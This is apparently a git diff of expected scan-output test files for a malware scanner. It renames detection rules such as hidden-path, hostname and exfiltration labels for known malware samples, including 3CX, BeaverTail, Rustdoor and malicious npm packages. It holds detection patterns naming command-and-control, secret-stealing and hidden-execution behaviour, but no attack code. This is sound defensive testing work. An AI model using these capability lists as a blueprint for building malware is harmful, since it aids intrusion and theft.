@@ -22,4 +23,3 @@ net/url/embedded: low os/fd/read: low persist/daemon: medium privesc/sudo: medium -process/name_get: medium diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff index 327667eb1..a7aea4804 100644 Binary files a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff and b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff differ diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff index 5df35e886..db9788ce8 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff @@ -24,7 +24,7 @@ | +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) | | +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | @@ -37,7 +37,7 @@ | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff index 327667eb1..a7aea4804 100644 Binary files a/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff and b/tests/macOS/2023.3CX/libffmpeg.decrease.mdiff differ diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff index 5df35e886..db9788ce8 100644 --- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff @@ -24,7 +24,7 @@ | +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) | | +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | @@ -37,7 +37,7 @@ | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff index 5df35e886..db9788ce8 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff @@ -24,7 +24,7 @@ | +CRITICAL | **[anti-static/xor/user_agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/xor/xor-user_agent.yara#xor_mozilla)** | XOR'ed user agent, often found in backdoors, by Florian Roth | [7UOTJ::$Mozilla_5_0](https://github.com/search?q=7%15%00%13%16%16%1BUOTJ%3A%3A%24Mozilla_5_0&type=code) | | +CRITICAL | **[impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#lazarus_darwin_nsurl)** | executes programs, sets permissions, sleeps, makes HTTP requests | [NSMutableURLRequest](https://github.com/search?q=NSMutableURLRequest&type=code)
[chmod](https://github.com/search?q=chmod&type=code)
[flock](https://github.com/search?q=flock&type=code)
[gethostname](https://github.com/search?q=gethostname&type=code)
[localtime](https://github.com/search?q=localtime&type=code)
[pclose](https://github.com/search?q=pclose&type=code)
[popen](https://github.com/search?q=popen&type=code)
[rand](https://github.com/search?q=rand&type=code)
[sleep](https://github.com/search?q=sleep&type=code)
[sprintf](https://github.com/search?q=sprintf&type=code)
[strncpy](https://github.com/search?q=strncpy&type=code) | | +MEDIUM | **[data/base64/decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/base64/base64-decode.yara#py_base64_decode)** | decode base64 strings | [base64_decode](https://github.com/search?q=base64_decode&type=code) | -| +MEDIUM | **[evasion/hidden_paths/hidden](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hidden_paths/hidden.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | +| +MEDIUM | **[evasion/file/prefix](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/file/prefix/prefix.yara#dynamic_hidden_path)** | [hidden path generated dynamically](https://objective-see.org/blog/blog_0x73.html) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code) | | +MEDIUM | **[exec/cmd/pipe](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/pipe.yara#popen)** | [launches program and reads its output](https://linux.die.net/man/3/popen) | [_pclose](https://github.com/search?q=_pclose&type=code)
[_popen](https://github.com/search?q=_popen&type=code) | | +MEDIUM | **[exec/shell/arbitrary_command_dev_null](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/arbitrary_command-dev_null.yara#cmd_dev_null)** | runs commands, discards output | ["%s" >/dev/null](https://github.com/search?q=%22%25s%22+%3E%2Fdev%2Fnull&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | @@ -37,7 +37,7 @@ | +LOW | **[data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip)** | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | +LOW | **[data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64)** | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | +LOW | **[data/random/insecure](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/random/insecure.yara#bsd_rand)** | [generate random numbers insecurely](https://man.openbsd.org/rand) | [_rand](https://github.com/search?q=_rand&type=code)
[srand](https://github.com/search?q=srand&type=code) | -| +LOW | **[discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| +LOW | **[discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname)** | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | | +LOW | **[discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME)** | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | | +LOW | **[exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM)** | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | | +LOW | **[fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir)** | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | diff --git a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple index a73095bc6..845055316 100644 --- a/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple +++ b/tests/macOS/2024.79-137-192-4/var_tmp_exe_starting2.simple @@ -1,7 +1,7 @@ # macOS/2024.79-137-192-4/var_tmp_exe_starting2: critical anti-static/xor/certs: high c2/tool_transfer/osascript: high -evasion/hidden_paths/var_tmp: medium +evasion/file/location/var_tmp: medium exec/script/osa: medium exec/shell/exec: medium fs/file/make_executable: high diff --git a/tests/macOS/2024.BeaverTail/Jami.json b/tests/macOS/2024.BeaverTail/Jami.json index 2728b51ed..fb6273f27 100644 --- a/tests/macOS/2024.BeaverTail/Jami.json +++ b/tests/macOS/2024.BeaverTail/Jami.json @@ -37,6 +37,14 @@ "ID": "anti-static/binary/opaque", "RuleName": "opaque_binary" }, + { + "Description": "higher entropy binary (\u003e7.2)", + "RiskScore": 2, + "RiskLevel": "MEDIUM", + "RuleURL": "https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/entropy.yara#high_entropy_7_2", + "ID": "anti-static/macho/entropy", + "RuleName": "high_entropy_7_2" + }, { "Description": "higher-entropy machO trailer (normally NULL) - possible viral infection", "MatchStrings": [ 
diff --git a/tests/macOS/2024.BeaverTail/client_5346.py.simple b/tests/macOS/2024.BeaverTail/client_5346.py.simple
index 54e68b086..71e1b84c2 100644
--- a/tests/macOS/2024.BeaverTail/client_5346.py.simple
+++ b/tests/macOS/2024.BeaverTail/client_5346.py.simple
@@ -4,7 +4,8 @@ c2/tool_transfer/python: high
 data/encoding/base64: low
 discover/system/platform: medium
 discover/user/HOME: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
+evasion/indicator_blocking/hidden_window: medium
 evasion/indicator_blocking/mask_exceptions: medium
 exec/imports/python: medium
 exec/install_additional/pip_install: high
diff --git a/tests/macOS/2024.Ezuri/libdpt1.so.simple b/tests/macOS/2024.Ezuri/libdpt1.so.simple
index 5851a1c32..65223eaba 100644
--- a/tests/macOS/2024.Ezuri/libdpt1.so.simple
+++ b/tests/macOS/2024.Ezuri/libdpt1.so.simple
@@ -3,7 +3,7 @@ anti-static/macho/footer: high
 anti-static/packer/aes: high
 anti-static/packer/ezuri: critical
 crypto/aes: low
-discover/system/cpu_info: low
+discover/system/cpu: low
 exec/plugin: low
 exec/program: medium
 fs/file/read: low
diff --git a/tests/macOS/2024.LightSpy/dropper.simple b/tests/macOS/2024.LightSpy/dropper.simple
index 8e89a4371..a1eedf707 100644
--- a/tests/macOS/2024.LightSpy/dropper.simple
+++ b/tests/macOS/2024.LightSpy/dropper.simple
@@ -6,10 +6,11 @@ c2/tool_transfer/macos: critical
 crypto/aes: low
 crypto/xor: high
 data/hash/md5: medium
-discover/system/cpu_info: low
-discover/system/network: high
+discover/multiple: high
+discover/process/name: medium
+discover/system/cpu: low
 discover/system/platform: medium
-evasion/hidden_paths/odd_pidfile: high
+evasion/file/location/pidfile: high
 exec/dylib/symbol_address: medium
 exec/dylib/user: medium
 exec/plugin: low
@@ -30,5 +31,4 @@ os/kernel/dispatch_semaphore: low
 os/sync/semaphore_user: low
 persist/daemon: medium
 persist/pid_file: medium
-process/name_get: medium
 sus/entitlement: medium
diff --git a/tests/macOS/2024.Rustdoor/localfile.simple b/tests/macOS/2024.Rustdoor/localfile.simple
index 93837a90a..f5189151e 100644
--- a/tests/macOS/2024.Rustdoor/localfile.simple
+++ b/tests/macOS/2024.Rustdoor/localfile.simple
@@ -15,15 +15,16 @@ crypto/aes: low
 data/compression/gzip: low
 data/compression/zstd: low
 data/embedded/zstd: medium
-discover/network/interface_get: low
-discover/system/cpu_info: medium
-discover/system/hardware_info: low
-discover/system/hostname_get: low
+discover/network/interface: low
+discover/system/cpu: medium
+discover/system/hardware: low
+discover/system/hostname: low
 discover/user/USER: low
-evasion/hidden_paths/relative_hidden: low
+evasion/file/attr/chflags: high
 exec/dylib/symbol_address: medium
 exec/program: medium
 exec/program/background: low
+exec/program/hidden: medium
 exec/script/osa: medium
 exec/shell/exec: medium
 exfil/stealer/notes: critical
diff --git a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
index dafd23ce8..685d7b1d2 100644
--- a/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
+++ b/tests/macOS/2024.cobaltstrike/EDnFsVAEbP.simple
@@ -12,7 +12,7 @@ data/hash/blake2b: low
 data/hash/sha1: low
 data/random/insecure: low
 discover/network/interface_list: medium
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 exec/cmd/pipe: medium
 exec/dylib/address_check: low
diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff
index 939d68075..523345be4 100644
--- a/tests/macOS/clean/ls.mdiff
+++ b/tests/macOS/clean/ls.mdiff
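Review bot: The Rustdoor expectation replaces `evasion/hidden_paths/relative_hidden: low` with `evasion/file/attr/chflags: high` and adds `exec/program/hidden: medium`, which is a new detection and a low-to-high risk jump rather than the one-for-one rename the surrounding hunks perform. A regenerated expected-output file locks in whatever the scanner currently emits, so this row deserves a manual check that the chflags and hidden-program rules genuinely fire on the sample and are not a side effect of the rule reorganisation. The same rename-plus-new-hit mix appears in the npm package.json.simple hunk further down, where `evasion/hidden_paths/relative_hidden: low` becomes `exec/program/hidden: medium`.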
@@ -1,13 +1,13 @@ ## Deleted: ls.x86_64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|---------|--------------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | -| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | -| -LOW | [discover/system/hostname_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname-get.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | -| -LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | -| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | +| RISK | KEY | DESCRIPTION | EVIDENCE | +|---------|------------------------------------------------------------------------------------------------------------------------------------|-----------------------------------------------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | +| -LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#gzip) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | +| -LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | +| -LOW | [exec/shell/TERM](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/TERM.yara#TERM) | [Look up or override terminal settings](https://www.gnu.org/software/gettext/manual/html_node/The-TERM-variable.html) | [TERM](https://github.com/search?q=TERM&type=code) | +| -LOW | 
[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | +| -LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://gnu.org/licenses/gpl.html](https://gnu.org/licenses/gpl.html)
[https://translationproject.org/team/](https://translationproject.org/team/)
[https://wiki.xiph.org/MIME_Types_and_File_Extensions](https://wiki.xiph.org/MIME_Types_and_File_Extensions)
[https://www.gnu.org/software/coreutils/](https://www.gnu.org/software/coreutils/) | ## Added: ls [🔵 LOW] diff --git a/tests/macOS/clean/ls.sdiff.trigger_2 b/tests/macOS/clean/ls.sdiff.trigger_2 index 9e0e93a9c..902593b69 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_2 +++ b/tests/macOS/clean/ls.sdiff.trigger_2 @@ -1,6 +1,6 @@ --- missing: ls.x86_64 -data/compression/lzma --discover/system/hostname_get +-discover/system/hostname -exec/shell/TERM -fs/link_read -net/url/embedded diff --git a/tests/macOS/clean/ls.sdiff.trigger_3 b/tests/macOS/clean/ls.sdiff.trigger_3 index 9e0e93a9c..902593b69 100644 --- a/tests/macOS/clean/ls.sdiff.trigger_3 +++ b/tests/macOS/clean/ls.sdiff.trigger_3 @@ -1,6 +1,6 @@ --- missing: ls.x86_64 -data/compression/lzma --discover/system/hostname_get +-discover/system/hostname -exec/shell/TERM -fs/link_read -net/url/embedded diff --git a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple index fbaac975e..5fff8faa7 100644 --- a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple +++ b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple @@ -1,7 +1,7 @@ # npm/2024.legacyreact-aws-s3-typescript/package.json: critical c2/tool_transfer/npm: critical c2/tool_transfer/shell: high -evasion/hidden_paths/relative_hidden: low +exec/program/hidden: medium exec/shell/background_launcher: high exfil/npm: high fs/file/make_executable: medium diff --git a/tests/npm/2024.persona-tool/preinstall.js.simple b/tests/npm/2024.persona-tool/preinstall.js.simple index b01cbfb82..6f3ca3470 100644 --- a/tests/npm/2024.persona-tool/preinstall.js.simple +++ b/tests/npm/2024.persona-tool/preinstall.js.simple @@ -3,7 +3,7 @@ anti-static/obfuscation/hex: medium c2/addr/ip: medium c2/discovery/ip_dns_resolver: medium data/encoding/json_encode: low -discover/system/hostname_get: low +discover/system/hostname: low exfil/nodejs: critical exfil/oob: critical net/dns: low 
diff --git a/tests/npm/2024.testerrrrrrrrrr/init.js.simple b/tests/npm/2024.testerrrrrrrrrr/init.js.simple
index 2f6a2655a..7544cae26 100644
--- a/tests/npm/2024.testerrrrrrrrrr/init.js.simple
+++ b/tests/npm/2024.testerrrrrrrrrr/init.js.simple
@@ -2,7 +2,7 @@
 anti-static/obfuscation/hex: medium
 anti-static/obfuscation/js: critical
 anti-static/obfuscation/python: critical
-c2/server_address: medium
+c2/addr/server: medium
 discover/network/interface_list: medium
 exec/shell/exec: medium
 exfil/nodejs: critical
diff --git a/tests/php/2024.sagsooz/2024.php.simple b/tests/php/2024.sagsooz/2024.php.simple
index cbfd6bcef..2bc7487d9 100644
--- a/tests/php/2024.sagsooz/2024.php.simple
+++ b/tests/php/2024.sagsooz/2024.php.simple
@@ -5,6 +5,7 @@ data/base64/decode: medium
 data/embedded/base64_url: medium
 data/embedded/html: medium
 data/encoding/base64: low
+discover/process/egid: medium
 evasion/indicator_blocking/mask_exceptions: medium
 evasion/time/php_no_limit: medium
 exec/shell/command: medium
@@ -17,4 +18,3 @@ net/http/form_upload: medium
 net/http/post: medium
 net/url/embedded: low
 net/url/encode: medium
-process/effective_groupid_get: medium
diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple
index 912b8d72f..6f3daa588 100644
--- a/tests/php/clean/composer-2.7.7.simple
+++ b/tests/php/clean/composer-2.7.7.simple
@@ -18,11 +18,11 @@ data/embedded/base64_url: medium
 data/embedded/pem_certificate: low
 data/encoding/base64: low
 data/encoding/reverse: low
-discover/system/hostname_get: low
+discover/system/hostname: low
 discover/system/platform: low
 discover/user/HOME: low
 discover/user/USER: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
 evasion/hijack_execution/DYLD_LIBRARY_PATH: medium
 exec/cmd: medium
 exec/plugin: low
